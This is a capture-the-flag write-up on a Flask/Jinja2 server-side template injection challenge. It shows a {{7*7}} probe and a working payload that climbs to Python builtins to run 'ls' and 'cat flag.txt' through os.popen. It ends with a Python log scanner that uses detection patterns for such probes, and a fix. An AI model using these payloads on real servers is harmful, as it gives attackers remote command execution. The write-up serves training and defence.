Challenge Description

Can you exploit this simple mistake?

Solution

Once the Templated instance has been started, we can visit the given <IP>:<PORT> combination to reach the challenge.

Visiting http://<IP>:<PORT>/ we get this output:

Site still under construction

Proudly powered by Flask/Jinja2

It’s a Flask app using Jinja2 as its template engine.

Flask/Jinja2 SSTI

We check to see if the app is vulnerable to SSTI:

http://<IP>:<PORT>/{{7*7}}:

Error 404

The page '49' could not be found

It is: the 404 page echoes 49 rather than the literal {{7*7}}, so the requested path is being rendered as a Jinja2 template.

Now we can walk from the request object up to the application's globals and builtins, import the os library, and run shell commands:

http://<IP>:<PORT>/{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}

Error 404

The page 'bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var ' could not be found

The listing shows flag.txt, so we can simply cat it out:

http://<IP>:<PORT>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

Error 404

The page 'HTB{t3m***********************************nk!} ' could not be found
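From the defender's side, the probes above leave a clear trace: URL-encoded template delimiters and dunder attribute walks in 404'd request paths. The following is an added example, not part of the original writeup, that scans constructed access-log lines (the log format and IPs are assumptions) for those indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in common log format (not from the challenge).
# Lines 3 and 4 carry URL-encoded versions of the probes shown in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 73
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /about HTTP/1.1" 404 85
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /%7B%7B7*7%7D%7D HTTP/1.1" 404 70
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /%7B%7Brequest.application.__globals__.__builtins__.__import__('os').popen('ls').read()%7D%7D HTTP/1.1" 404 200
"""

# Parse client IP, method, raw path and status out of a common-log-format line.
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators: Jinja2 expression/statement delimiters, and the dunder attributes
# used to climb from a template context to Python builtins.
SSTI_PATTERNS = [
    ("template_expr", re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)),
    ("dunder_walk", re.compile(r"__(?:globals|builtins|import|class|mro|subclasses)__")),
]


def find_ssti_probes(log_text):
    """Return one record per request whose decoded path matches an SSTI indicator."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = unquote(m.group("path"))  # decode %7B%7B -> {{ before matching
        matched = [name for name, rx in SSTI_PATTERNS if rx.search(path)]
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "path": path,
                "status": int(m.group("status")),
                "indicators": matched,
            })
    return hits


if __name__ == "__main__":
    for hit in find_ssti_probes(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["indicators"], hit["path"])
```

A 404 response to such a path is the tell for this challenge's bug: the error handler renders the path itself as a template, so the fix is to pass it as a context variable rather than interpolating it into the template string.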